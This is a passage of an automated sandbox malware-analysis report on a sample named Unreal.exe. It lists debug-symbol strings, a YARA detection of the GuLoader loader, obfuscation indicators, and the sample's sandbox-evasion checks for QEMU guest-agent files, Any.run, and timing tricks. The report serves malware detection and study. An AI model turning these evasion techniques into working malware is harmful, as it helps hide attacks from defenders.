        Source: Binary string: iphlpapi.pdb=I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb( source: WerFault.exe, 0000000C.00000003.5590924536.00000000065A3000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb( source: WerFault.exe, 0000000C.00000003.5579261146.0000000005D95000.00000004.00000001.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 0000000C.00000003.5609368577.00000000049D1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 0000000C.00000003.5552657974.000000000523E000.00000004.00000001.sdmp
        Source: Binary string: gpapi.pdb source: WerFault.exe, 0000000C.00000003.5555030899.0000000006AAD000.00000004.00000001.sdmp
        Source: Binary string: rsaenh.pdb( source: WerFault.exe, 0000000C.00000003.5585066686.00000000069F8000.00000004.00000001.sdmp
        Source: Binary string: wwin32u.pdb( source: WerFault.exe, 0000000C.00000003.5553896637.0000000002816000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb.X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb"X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdb( source: WerFault.exe, 0000000C.00000003.5578930131.000000000657C000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.5556924766.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdbLX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb( source: WerFault.exe, 0000000C.00000003.5553864316.0000000002810000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb( source: WerFault.exe, 0000000C.00000003.5560528570.0000000005D57000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.5551962205.00000000027F4000.00000004.00000001.sdmp
        Source: Binary string: sfc.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb source: WerFault.exe, 0000000C.00000003.5590924536.00000000065A3000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdbTX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: ole32.pdb( source: WerFault.exe, 0000000C.00000003.5569202232.000000000599E000.00000004.00000001.sdmp
        Source: Binary string: shcore.pdb( source: WerFault.exe, 0000000C.00000003.5563767171.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: netutils.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 0000000C.00000003.5552283718.0000000002827000.00000004.00000001.sdmp
        Source: Binary string: WLDP.pdbZX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdbFX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 0000000C.00000003.5573477863.0000000005D79000.00000004.00000001.sdmp
        Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 0000000C.00000003.5553966425.0000000002821000.00000004.00000001.sdmp
        Source: Binary string: shell32.pdb( source: WerFault.exe, 0000000C.00000003.5553602111.0000000005228000.00000004.00000001.sdmp
        Source: Binary string: MpAdlStub.pdb source: mpam-20b5c938.exe, 00000017.00000000.6138920683.00007FF7EC2AF000.00000002.00020000.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.5563767171.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb( source: WerFault.exe, 0000000C.00000003.5595558950.0000000006B6A000.00000004.00000001.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb( source: WerFault.exe, 0000000C.00000003.5557732587.0000000005233000.00000004.00000001.sdmp
        Source: Binary string: ck.pdb) source: WerFault.exe, 0000000C.00000003.5565025438.0000000005F5B000.00000004.00000001.sdmp
        Source: Binary string: MpClient.pdb source: MpSigStub.exe, 00000018.00000003.6171462961.0000025A7B312000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb7I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb( source: WerFault.exe, 0000000C.00000003.5579000492.0000000006587000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb( source: WerFault.exe, 0000000C.00000003.5564336996.0000000005982000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdboJ source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb( source: WerFault.exe, 0000000C.00000003.5579357046.0000000005DA6000.00000004.00000001.sdmp
        Source: Binary string: sechost.pdbxX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb( source: WerFault.exe, 0000000C.00000003.5556924766.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb( source: WerFault.exe, 0000000C.00000003.5555988282.000000000598D000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000C.00000003.5569029216.0000000006592000.00000004.00000001.sdmp
        Source: Binary string: fwpuclnt.pdb( source: WerFault.exe, 0000000C.00000003.5570732197.0000000006581000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000000C.00000003.5568021975.0000000006245000.00000004.00000001.sdmp
        Source: Binary string: MpSigStub.pdb source: mpam-20b5c938.exe, 00000017.00000003.6155056829.000001C6B5161000.00000004.00000001.sdmp, MpSigStub.exe, 00000018.00000003.6173396179.0000025A7B313000.00000004.00000001.sdmp, MpSigStub.exe.23.dr
        Source: Binary string: ole32.pdbrX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb( source: WerFault.exe, 0000000C.00000003.5552632966.0000000005239000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.5550085829.000000000278F000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000C.00000003.5563888052.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb<X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb0X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb# source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb( source: WerFault.exe, 0000000C.00000003.5586901895.0000000006598000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb( source: WerFault.exe, 0000000C.00000003.5581399598.0000000006576000.00000004.00000001.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb( source: WerFault.exe, 0000000C.00000003.5552064732.0000000002805000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb( source: WerFault.exe, 0000000C.00000003.5569029216.0000000006592000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdb( source: WerFault.exe, 0000000C.00000003.5579678253.00000000064BF000.00000004.00000001.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000C.00000003.5570732197.0000000006581000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb( source: WerFault.exe, 0000000C.00000003.5559728887.0000000005D8A000.00000004.00000001.sdmp
        Source: Binary string: MpAdlStub.pdbGCTL source: mpam-20b5c938.exe, 00000017.00000000.6138920683.00007FF7EC2AF000.00000002.00020000.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.5590481067.0000000006A53000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.5551996504.00000000027FA000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb( source: WerFault.exe, 0000000C.00000003.5568021975.0000000006245000.00000004.00000001.sdmp
        Source: Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 00000018.00000003.6171462961.0000025A7B312000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb( source: WerFault.exe, 0000000C.00000003.5558896267.0000000005D9B000.00000004.00000001.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winspool.pdb(X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.5553864316.0000000002810000.00000004.00000001.sdmp
        Source: Binary string: wininet.pdb( source: WerFault.exe, 0000000C.00000003.5553538636.00000000059A4000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000008.00000002.5646431545.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.5536067468.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.5526072916.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_00406669 push ds; iretd
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_00404623 push esp; iretd
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_004064A6 push ebx; retf
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_0040276E push ebx; iretd
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_02240A49 push FFFFFF86h; retf
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_022444AF push FFFFFFF7h; iretd
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_022442DD push esi; retf
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_0224310D push ss; retf
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_02243169 push ss; retf
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_022411CC push ds; iretd
        Source: C:\Users\user\Desktop\Unreal.exeCode function: 0_2_022447D0 push ss; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D52167 push DE1ECAFBh; retf DE1Eh
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D55AED push eax; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5628C push ds; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D53221 push esp; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D51B33 push cs; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D50B2A push FFFFFFDEh; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D52544 push ebp; retf
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdmJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdmJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdmJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdmJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdmJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdmJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
        Source: C:\Users\user\Desktop\Unreal.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\Unreal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\Unreal.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: Unreal.exe, 00000000.00000002.3501073850.00000000005B4000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
        Source: Unreal.exe, 00000000.00000002.3501696726.0000000002260000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
        Source: Unreal.exe, 00000000.00000002.3501696726.0000000002260000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000000.5526462839.0000000000FE0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2724Thread sleep time: -225000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeDropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdmJump to dropped file
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeDropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdmJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D599BA rdtsc
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess information queried: ProcessInformation
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2B030 FindNextFileW,FindClose,FindFirstFileW,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E52504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,
        Source: C:\Users\user\Desktop\Unreal.exeSystem information queried: ModuleInformation
